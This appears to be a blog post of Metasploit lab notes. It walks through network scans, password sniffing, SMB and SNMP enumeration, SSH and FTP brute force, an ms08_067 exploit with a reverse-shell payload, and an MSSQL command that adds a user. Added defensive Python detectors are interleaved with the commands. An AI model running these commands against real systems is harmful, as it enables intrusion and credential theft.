E11iot

Just for fun


1. db_nmap

  • Same usage as nmap; the results are stored in the msf database

    msf > db_nmap -sV 192.168.6.0/24
    

2. Host discovery scan

  • use auxiliary/scanner/discovery/arp_sweep
  • set INTERFACE, RHOSTS, SHOST, SMAC, THREADS; run

    msf > search arp
    msf > use auxiliary/scanner/discovery/arp_sweep
    msf auxiliary(scanner/discovery/arp_sweep) > show options 
    msf auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 192.168.6.0/24
    msf auxiliary(scanner/discovery/arp_sweep) > set INTERFACE eth0
    msf auxiliary(scanner/discovery/arp_sweep) > set THREADS 20
    msf auxiliary(scanner/discovery/arp_sweep) > run
    

3. Port scan

  • use auxiliary/scanner/portscan/syn
  • set INTERFACE, PORTS, RHOSTS, THREADS; run

    msf > search portscan
    msf > use auxiliary/scanner/portscan/syn
    msf auxiliary(scanner/portscan/syn) > show options 
    msf auxiliary(scanner/portscan/syn) > set INTERFACE eth0
    msf auxiliary(scanner/portscan/syn) > set PORTS 80
    msf auxiliary(scanner/portscan/syn) > set RHOSTS 10.10.10.0/24
    msf auxiliary(scanner/portscan/syn) > set THREADS 50
    msf auxiliary(scanner/portscan/syn) > run
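The syn module sends one SYN to each port in PORTS on every host in RHOSTS, so from the scanned network's side the scan shows up as a single source touching many destination ports on one host within a few seconds. The Python below is an added example, not code from the original post or from Metasploit, that looks for that pattern in firewall logs; the log lines are constructed samples in iptables LOG format, and the 10-second window and five-port threshold are assumed tuning values rather than anything the post specifies.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed iptables-style LOG lines (sample data, not a real capture).
# 10.10.10.131 hits six different ports on one host inside two seconds,
# which is what a SYN sweep looks like to the target; 10.10.10.5 is normal
# traffic to two services and must not be flagged.
SAMPLE_LOG = """\
Sep  4 15:40:01 gw kernel: IN=eth0 OUT= SRC=10.10.10.5 DST=10.10.10.148 PROTO=TCP SPT=51000 DPT=80 SYN
Sep  4 15:40:01 gw kernel: IN=eth0 OUT= SRC=10.10.10.131 DST=10.10.10.148 PROTO=TCP SPT=40101 DPT=21 SYN
Sep  4 15:40:01 gw kernel: IN=eth0 OUT= SRC=10.10.10.131 DST=10.10.10.148 PROTO=TCP SPT=40102 DPT=22 SYN
Sep  4 15:40:02 gw kernel: IN=eth0 OUT= SRC=10.10.10.131 DST=10.10.10.148 PROTO=TCP SPT=40103 DPT=23 SYN
Sep  4 15:40:02 gw kernel: IN=eth0 OUT= SRC=10.10.10.131 DST=10.10.10.148 PROTO=TCP SPT=40104 DPT=25 SYN
Sep  4 15:40:02 gw kernel: IN=eth0 OUT= SRC=10.10.10.131 DST=10.10.10.148 PROTO=TCP SPT=40105 DPT=80 SYN
Sep  4 15:40:03 gw kernel: IN=eth0 OUT= SRC=10.10.10.131 DST=10.10.10.148 PROTO=TCP SPT=40106 DPT=443 SYN
Sep  4 15:45:10 gw kernel: IN=eth0 OUT= SRC=10.10.10.5 DST=10.10.10.148 PROTO=TCP SPT=51001 DPT=443 SYN
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) .*?SRC=(?P<src>[\d.]+) DST=(?P<dst>[\d.]+) "
    r"PROTO=TCP .*?DPT=(?P<dpt>\d+) SYN"
)


def parse_syn_events(text):
    """Return a list of (time, src, dst, dport) for every logged TCP SYN."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year; differences within a day still work
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
        events.append((ts, m["src"], m["dst"], int(m["dpt"])))
    return events


def detect_port_sweeps(events, window=timedelta(seconds=10), min_ports=5):
    """Flag (src, dst) pairs that touch at least min_ports distinct destination
    ports inside any interval of length `window` (assumed thresholds).
    Returns {(src, dst): sorted distinct ports seen in the first hit window}."""
    by_pair = defaultdict(list)
    for ts, src, dst, dport in events:
        by_pair[(src, dst)].append((ts, dport))
    hits = {}
    for pair, evs in by_pair.items():
        evs.sort()
        for i, (t0, _) in enumerate(evs):
            ports = {p for t, p in evs[i:] if t - t0 <= window}
            if len(ports) >= min_ports:
                hits[pair] = sorted(ports)
                break
    return hits


if __name__ == "__main__":
    for (src, dst), ports in detect_port_sweeps(parse_syn_events(SAMPLE_LOG)).items():
        print(f"possible SYN sweep from {src} against {dst}: ports {ports}")
```

The same counting logic applies to netflow or IDS alerts once they are reduced to (time, src, dst, dport) tuples; only the parser changes.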
    

4. Zombie (idle) scan

  • Find hosts with a usable IP ID sequence (zombie candidates)

    • use auxiliary/scanner/ip/ipidseq
    • set RHOSTS 192.168.1.0/24; run
  • nmap -PN -sI 10.10.10.147 10.10.10.132

    msf > use auxiliary/scanner/ip/ipidseq
    msf auxiliary(scanner/ip/ipidseq) > show options 
    msf auxiliary(scanner/ip/ipidseq) > set RHOSTS 10.10.10.100-150
    msf auxiliary(scanner/ip/ipidseq) > set THREADS 20
    msf auxiliary(scanner/ip/ipidseq) > run
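ipidseq works by probing a host several times and watching how the IP ID field changes between replies: a host that bumps the counter by one per packet lets a third party read its traffic volume off the wire, which is the precondition for using it as an idle-scan zombie. The Python below is an added example, not the module's code and not from the original post, that classifies a sequence of observed IP IDs with a simplified version of that heuristic so an administrator can find which of their own hosts still expose a predictable counter. The category names, the per-probe increment limit of 10 and the 20000 "positive jump" limit are my own simplification, not the module's output strings, and the observations are constructed samples.

```python
from typing import Dict, List, Sequence

# Assumed thresholds for the simplified classifier.
MAX_INCREMENT = 10          # per-probe step that still counts as "incremental"
MAX_POSITIVE_JUMP = 20000   # largest wrapped difference still called a positive increment


def _diffs(values: Sequence[int]) -> List[int]:
    """Consecutive differences of a 16-bit counter, wrapped modulo 65536."""
    return [(b - a) % 65536 for a, b in zip(values, values[1:])]


def _byteswap16(v: int) -> int:
    return ((v & 0xFF) << 8) | (v >> 8)


def classify_ipid_sequence(ipids: Sequence[int]) -> str:
    """Classify how a host's IP ID field moves between consecutive replies."""
    if len(ipids) < 3:
        return "unknown"
    if all(v == 0 for v in ipids):
        return "all zeros"
    diffs = _diffs(ipids)
    if all(d == 0 for d in diffs):
        return "all duplicates"
    if all(1 <= d <= MAX_INCREMENT for d in diffs):
        return "incremental"
    # Some stacks increment the counter in host byte order but emit it
    # big-endian, so the +1 only appears after swapping the two bytes.
    if all(1 <= d <= MAX_INCREMENT for d in _diffs([_byteswap16(v) for v in ipids])):
        return "broken little-endian incremental"
    if all(1 <= d <= MAX_POSITIVE_JUMP for d in diffs):
        return "random positive increments"
    return "randomized"


def is_zombie_candidate(ipids: Sequence[int]) -> bool:
    """True when the counter is predictable enough for the idle-scan trick."""
    return classify_ipid_sequence(ipids) in ("incremental", "broken little-endian incremental")


def audit_hosts(observations: Dict[str, Sequence[int]]) -> List[str]:
    """Hosts whose IP ID behaviour should be fixed (OS update or IP ID
    randomisation) before someone else uses them as a scan proxy."""
    return sorted(h for h, ids in observations.items() if is_zombie_candidate(ids))


# Constructed sample observations (not real probe results).
SAMPLE_OBSERVATIONS = {
    "10.10.10.147": [4210, 4211, 4212, 4213, 4214, 4215],       # classic +1 counter
    "10.10.10.150": [0x0100, 0x0200, 0x0300, 0x0400, 0x0500],  # increments only after byte swap
    "10.10.10.132": [43012, 1744, 60231, 9981, 27790],         # randomised
    "10.10.10.149": [0, 0, 0, 0, 0],                           # always zero
}

if __name__ == "__main__":
    for host, ids in SAMPLE_OBSERVATIONS.items():
        print(f"{host}: {classify_ipid_sequence(ids)}")
    print("zombie candidates:", audit_hosts(SAMPLE_OBSERVATIONS))
```

A host reported as incremental is usually an old Windows release, an embedded device or a printer; the fix is an update or a stack that randomises IP IDs, and until then its traffic counters are readable by anyone who can reach it.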

 

5. UDP scan

  • use auxiliary/scanner/discovery/udp_sweep

    msf > use auxiliary/scanner/discovery/udp_sweep
    msf auxiliary(scanner/discovery/udp_sweep) > show options 
    msf auxiliary(scanner/discovery/udp_sweep) > set RHOSTS 10.10.10.100-150
    msf auxiliary(scanner/discovery/udp_sweep) > run

  • use auxiliary/scanner/discovery/udp_probe

    msf > use auxiliary/scanner/discovery/udp_probe
    msf auxiliary(scanner/discovery/udp_probe) > show options 
    msf auxiliary(scanner/discovery/udp_probe) > set RHOSTS 10.10.10.100-150
    msf auxiliary(scanner/discovery/udp_probe) > set CHOST 10.10.10.131
    msf auxiliary(scanner/discovery/udp_probe) > set THREADS 20
    msf auxiliary(scanner/discovery/udp_probe) > run

6. Password sniffing

  • use auxiliary/sniffer/psnuffle
  • Can also extract passwords from a pcap capture file
  • Similar in function to dsniff
  • Currently supports only POP3, IMAP, FTP and HTTP GET

    msf > search sniffer
    msf > use auxiliary/sniffer/psnuffle
    msf auxiliary(sniffer/psnuffle) > show options 
    msf auxiliary(sniffer/psnuffle) > set INTERFACE eth0
    msf auxiliary(sniffer/psnuffle) > run
    

    # generate some FTP traffic while the sniffer is running
    root@kali:~# ftp 10.10.10.148
    

    # continued from above
    msf auxiliary(sniffer/psnuffle) > show options
    msf auxiliary(sniffer/psnuffle) > set PCAPFILE /root/ftp.pcapng
    msf auxiliary(sniffer/psnuffle) > jobs
    msf auxiliary(sniffer/psnuffle) > kill 0
    msf auxiliary(sniffer/psnuffle) > run
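psnuffle finds credentials because FTP, POP3, IMAP and HTTP Basic all send the username and password as plain protocol text. The Python below is an added example, not from the original post and not the psnuffle code, that applies the same decoding idea from the defender's side: it takes client-to-server payloads (constructed samples here, each tagged with the server port, which is how psnuffle picks its decoder) and reports which services still carry cleartext logins. It records only the service, the username and the password length, so the audit output itself never contains the secret.

```python
import base64
import re

# Constructed client->server payloads, tagged with the server port
# (sample data, not a real capture). The Basic header is built with
# base64 at load time so the sample stays readable.
SAMPLE_SESSIONS = [
    (21,  "USER alice\r\nPASS s3cret!\r\nLIST\r\n"),
    (110, "USER bob@example.test\r\nPASS hunter2\r\nSTAT\r\n"),
    (143, 'a001 LOGIN carol "p@ss word"\r\na002 SELECT INBOX\r\n'),
    (80,  "GET /admin HTTP/1.1\r\nHost: intranet.example.test\r\n"
          "Authorization: Basic " + base64.b64encode(b"dave:pass123").decode() + "\r\n\r\n"),
    (22,  "SSH-2.0-OpenSSH_7.7\r\n"),   # encrypted service: nothing to find
]

FTP_POP_RE = re.compile(r"^(USER|PASS) (.+?)\r?$", re.M | re.I)
IMAP_LOGIN_RE = re.compile(r'^\S+ LOGIN (?:"([^"]*)"|(\S+)) (?:"([^"]*)"|(\S+))\r?$', re.M | re.I)
BASIC_RE = re.compile(r"^Authorization: Basic ([A-Za-z0-9+/=]+)\r?$", re.M | re.I)


def _finding(service, user, password):
    # Deliberately keeps only the length of the password.
    return {"service": service, "user": user, "password_len": len(password)}


def extract_cleartext_logins(port, payload):
    """Return the cleartext logins found in one client->server payload."""
    findings = []
    if port in (21, 110):
        service = "ftp" if port == 21 else "pop3"
        user = password = None
        for cmd, arg in FTP_POP_RE.findall(payload):
            if cmd.upper() == "USER":
                user = arg
            else:
                password = arg
        if user is not None and password is not None:
            findings.append(_finding(service, user, password))
    elif port == 143:
        for m in IMAP_LOGIN_RE.finditer(payload):
            user = m.group(1) if m.group(1) is not None else m.group(2)
            password = m.group(3) if m.group(3) is not None else m.group(4)
            findings.append(_finding("imap", user, password))
    elif port == 80:
        for token in BASIC_RE.findall(payload):
            try:
                decoded = base64.b64decode(token).decode("utf-8", "replace")
            except ValueError:       # binascii.Error is a ValueError
                continue
            user, _, password = decoded.partition(":")
            findings.append(_finding("http-basic", user, password))
    return findings


def audit_sessions(sessions):
    """Run the extractor over (port, payload) pairs and collect findings."""
    out = []
    for port, payload in sessions:
        out.extend(extract_cleartext_logins(port, payload))
    return out


if __name__ == "__main__":
    for f in audit_sessions(SAMPLE_SESSIONS):
        print(f"{f['service']:10s} user={f['user']} password_len={f['password_len']}")
```

Any service that appears in this report is one where a passive listener on the path, or a pcap that leaks later, yields working credentials; the remedy is TLS (FTPS/SFTP, POP3S, IMAPS, HTTPS) rather than a stronger password.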
    

7. SNMP scan

  • vim /etc/snmp/snmpd.conf (change the listen address to 0.0.0.0:161)
  • use auxiliary/scanner/snmp/snmp_login
  • use auxiliary/scanner/snmp/snmp_enum
  • use auxiliary/scanner/snmp/snmp_enumusers (Windows)
  • use auxiliary/scanner/snmp/snmp_enumshares (Windows)
  • snmp_login

    msf > use auxiliary/scanner/snmp/snmp_login
    msf auxiliary(scanner/snmp/snmp_login) > show options 
    msf auxiliary(scanner/snmp/snmp_login) > set RHOSTS 10.10.10.149
    msf auxiliary(scanner/snmp/snmp_login) > set THREADS 20
    msf auxiliary(scanner/snmp/snmp_login) > run

  • snmp_enum

    msf > use auxiliary/scanner/snmp/snmp_enum
    msf auxiliary(scanner/snmp/snmp_enum) > show options 
    msf auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.10.149
    msf auxiliary(scanner/snmp/snmp_enum) > run

  • snmp_enum against the Windows host (needs its community string)

    msf > use auxiliary/scanner/snmp/snmp_enum
    msf auxiliary(scanner/snmp/snmp_enum) > show options 
    msf auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.10.142   # Windows host
    msf auxiliary(scanner/snmp/snmp_enum) > run
    msf auxiliary(scanner/snmp/snmp_enum) > set COMMUNITY jlcssadmin   # community string of the SNMP server
    msf auxiliary(scanner/snmp/snmp_enum) > set THREADS 20
    msf auxiliary(scanner/snmp/snmp_enum) > run

  • snmp_enumusers

    msf > use auxiliary/scanner/snmp/snmp_enumusers
    msf auxiliary(scanner/snmp/snmp_enumusers) > show options 
    msf auxiliary(scanner/snmp/snmp_enumusers) > set COMMUNITY jlcssadmin
    msf auxiliary(scanner/snmp/snmp_enumusers) > set RHOSTS 10.10.10.142
    msf auxiliary(scanner/snmp/snmp_enumusers) > run


8. SMB 扫描

  • SMB version scan

    • use auxiliary/scanner/smb/smb_version
  • Scan named pipes to determine the SMB service type (username, password)

    • use auxiliary/scanner/smb/pipe_auditor
  • Scan the DCERPC services reachable through SMB pipes

    • use auxiliary/scanner/smb/pipe_dcerpc_auditor
  • SMB share enumeration (username, password)

    • use auxiliary/scanner/smb/smb_enumshares
  • SMB user enumeration (username, password)

    • use auxiliary/scanner/smb/smb_enumusers
  • SID enumeration (username, password)

    • use auxiliary/scanner/smb/smb_lookupsid
  • SMB version scan

    # continued from above
    msf auxiliary(scanner/smb/smb_version) > set SMBUSER Administrator
    msf auxiliary(scanner/smb/smb_version) > set SMBPass 123456
    msf auxiliary(scanner/smb/smb_version) > run
    

  • Scan named pipes to determine the SMB service type (username, password)

    msf > use auxiliary/scanner/smb/pipe_auditor
    msf auxiliary(scanner/smb/pipe_auditor) > show options 
    msf auxiliary(scanner/smb/pipe_auditor) > set RHOSTS 10.10.10.148
    msf auxiliary(scanner/smb/pipe_auditor) > run
    

    # continued from above
    msf auxiliary(scanner/smb/pipe_auditor) > set SMBUser Administrator
    msf auxiliary(scanner/smb/pipe_auditor) > set SMBPass 123456
    

  • Scan the DCERPC services reachable through SMB pipes

    msf > use auxiliary/scanner/smb/pipe_dcerpc_auditor
    msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > show options 
    msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > set RHOSTS 10.10.10.148
    msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > run
    

    # continued from above
    msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > set SMBUser Administrator
    msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > set SMBPass 123456
    msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > run
    

  • SMB share enumeration (username, password)

    msf > use auxiliary/scanner/smb/smb_enumshares
    msf auxiliary(scanner/smb/smb_enumshares) > show options 
    msf auxiliary(scanner/smb/smb_enumshares) > set RHOSTS 10.10.10.148
    msf auxiliary(scanner/smb/smb_enumshares) > run
    

    # continued from above
    msf auxiliary(scanner/smb/smb_enumshares) > set SMBUser Administrator
    msf auxiliary(scanner/smb/smb_enumshares) > set SMBPass 123456
    msf auxiliary(scanner/smb/smb_enumshares) > run
    

  • SMB user enumeration (username, password)

    msf > use auxiliary/scanner/smb/smb_enumusers
    msf auxiliary(scanner/smb/smb_enumusers) > show options 
    msf auxiliary(scanner/smb/smb_enumusers) > set RHOSTS 10.10.10.148
    msf auxiliary(scanner/smb/smb_enumusers) > run
    

    # continued from above
    msf auxiliary(scanner/smb/smb_enumusers) > set SMBUser Administrator
    msf auxiliary(scanner/smb/smb_enumusers) > set SMBPass 123456
    msf auxiliary(scanner/smb/smb_enumusers) > run
    

  • SID enumeration (username, password)

    msf > use auxiliary/scanner/smb/smb_lookupsid
    msf auxiliary(scanner/smb/smb_lookupsid) > show options 
    msf auxiliary(scanner/smb/smb_lookupsid) > set RHOSTS 10.10.10.148
    

    # continued from above
    msf auxiliary(scanner/smb/smb_lookupsid) > set SMBUser Administrator
    msf auxiliary(scanner/smb/smb_lookupsid) > set SMBPass 123456
    msf auxiliary(scanner/smb/smb_lookupsid) > run
    


9. SSH scan

  • SSH version scan

    • use auxiliary/scanner/ssh/ssh_version
  • SSH password brute force

    • use auxiliary/scanner/ssh/ssh_login
      • set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt; set VERBOSE false; run
  • SSH public-key login

    • use auxiliary/scanner/ssh/ssh_login_pubkey
      • set KEY_FILE id_rsa; set USERNAME root; run
  • SSH version scan

    msf > use auxiliary/scanner/ssh/ssh_version
    msf auxiliary(scanner/ssh/ssh_version) > set RHOSTS 10.10.10.132
    msf auxiliary(scanner/ssh/ssh_version) > run
    

  • SSH password brute force

    root@kali:~# more /usr/share/metasploit-framework/data/wordlists/root_userpass.txt 
    
    msf > use auxiliary/scanner/ssh/ssh_login
    msf auxiliary(scanner/ssh/ssh_login) > set RHOSTS 10.10.10.132
    msf auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
    msf auxiliary(scanner/ssh/ssh_login) > set VERBOSE false 
    msf auxiliary(scanner/ssh/ssh_login) > run
    

  • SSH public-key login

    msf > use auxiliary/scanner/ssh/ssh_login_pubkey
    msf auxiliary(scanner/ssh/ssh_login_pubkey) > set RHOSTS 10.10.10.132
    msf auxiliary(scanner/ssh/ssh_login_pubkey) > set USERNAME root
    msf auxiliary(scanner/ssh/ssh_login_pubkey) > set KEY_PATH id_rsa_test_file
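What ssh_login with root_userpass.txt actually tests for is an sshd that still accepts password authentication, lets root log in with a password, and allows many guesses per connection. The Python below is an added example, not part of the original post, that parses an sshd_config the way sshd reads it (the first occurrence of a keyword wins, and directives inside Match blocks are skipped) and reports those three settings; the defaults it assumes for absent keywords are the ones documented in sshd_config(5), and both config fragments are constructed samples, with the weak one beside the hardened one.

```python
# Constructed sshd_config fragments (sample data, not from any real host).
WEAK_SSHD_CONFIG = """\
# /etc/ssh/sshd_config (constructed weak example)
Port 22
PermitRootLogin yes
PasswordAuthentication yes
MaxAuthTries 20
"""

HARDENED_SSHD_CONFIG = """\
# /etc/ssh/sshd_config (constructed hardened example)
Port 22
PermitRootLogin prohibit-password
PasswordAuthentication no
PubkeyAuthentication yes
MaxAuthTries 3
LoginGraceTime 30
"""

# Defaults from sshd_config(5) (OpenSSH 7.x and later) for absent keywords.
DEFAULTS = {
    "permitrootlogin": "prohibit-password",
    "passwordauthentication": "yes",
    "maxauthtries": "6",
}


def parse_sshd_config(text):
    """Return {keyword_lower: value} for the global section. Keeps the FIRST
    occurrence of each keyword, as sshd does, and stops at the first Match
    block because everything after it is conditional."""
    cfg = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)          # "Keyword value", whitespace separated
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            break
        cfg.setdefault(key, value)
    return cfg


def audit_sshd_config(text):
    """Report the settings that make an online password-guessing run worthwhile."""
    cfg = parse_sshd_config(text)

    def get(key):
        return cfg.get(key, DEFAULTS[key]).lower()

    findings = []
    if get("passwordauthentication") == "yes":
        findings.append("PasswordAuthentication yes: online password guessing "
                        "(e.g. ssh_login with a wordlist) is possible")
    if get("permitrootlogin") == "yes":
        findings.append("PermitRootLogin yes: root can log in with a password")
    tries = int(get("maxauthtries"))
    if tries > 6:
        findings.append(f"MaxAuthTries {tries}: more guesses per connection than the default of 6")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_SSHD_CONFIG), ("hardened", HARDENED_SSHD_CONFIG)):
        print(name, "->", audit_sshd_config(text) or "no findings")
```

Note that a config containing none of the three keywords still gets a finding, because sshd's own default is PasswordAuthentication yes; the check reasons about effective values, not about which lines happen to be present.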
    

10. Missing Windows patches

  • Runs against a session that has already been obtained
  • use post/windows/gather/enum_patches

    • show advanced
    • set VERBOSE yes
  • If the check fails

    • known bug in WMI query, try migrating to another process
    • Migrate to another process and try again
  • ms08-067

    msf > use exploit/windows/smb/ms08_067_netapi
    msf exploit(windows/smb/ms08_067_netapi) > set RHOST 10.10.10.147
    msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
    msf exploit(windows/smb/ms08_067_netapi) > run
    

    meterpreter > background
    msf exploit(windows/smb/ms08_067_netapi) > sessions 
    

    msf exploit(windows/smb/ms08_067_netapi) > use post/windows/gather/enum_patches
    msf post(windows/gather/enum_patches) > set SESSION 4
    msf post(windows/gather/enum_patches) > run
    

    # WMI query error: migrate to another process
    msf post(windows/gather/enum_patches) > sessions -i 4
    meterpreter > getpid
    meterpreter > ps
    meterpreter > migrate 828  # spoolsv.exe
    meterpreter > background 
    msf post(windows/gather/enum_patches) > run
    

11. MSSQL scan

  • MSSQL port scan

    • TCP 1422 (dynamic port) / UDP 1434 (used to look up the TCP port number)
    • use auxiliary/scanner/mssql/mssql_ping
  • Brute-force the MSSQL password

    • use auxiliary/scanner/mssql/mssql_login
  • Remote code execution (after obtaining database privileges)

    • use auxiliary/admin/mssql/mssql_exec
    • set CMD net user user1 pass123 /ADD
  • MSSQL port scan

    msf > use auxiliary/scanner/mssql/mssql_ping
    msf auxiliary(scanner/mssql/mssql_ping) > set RHOSTS 10.10.10.142
    msf auxiliary(scanner/mssql/mssql_ping) > run
    

12. FTP scan

  • FTP version scan

    • use auxiliary/scanner/ftp/ftp_version
    • use auxiliary/scanner/ftp/anonymous
    • use auxiliary/scanner/ftp/ftp_login
  • use auxiliary/scanner/ [tab]

    • Display all 479 possibilities? (y or n)
  • Query version information

    msf > use auxiliary/scanner/ftp/ftp_version
    msf auxiliary(scanner/ftp/ftp_version) > set RHOSTS 10.10.10.132
    msf auxiliary(scanner/ftp/ftp_version) > run
    

  • Whether anonymous login is allowed

    msf > use auxiliary/scanner/ftp/anonymous
    msf auxiliary(scanner/ftp/anonymous) > set RHOSTS 10.10.10.132
    msf auxiliary(scanner/ftp/anonymous) > run
    

  • Brute force

    use auxiliary/scanner/ftp/ftp_login
posted on 2018-09-04 15:51  E11iot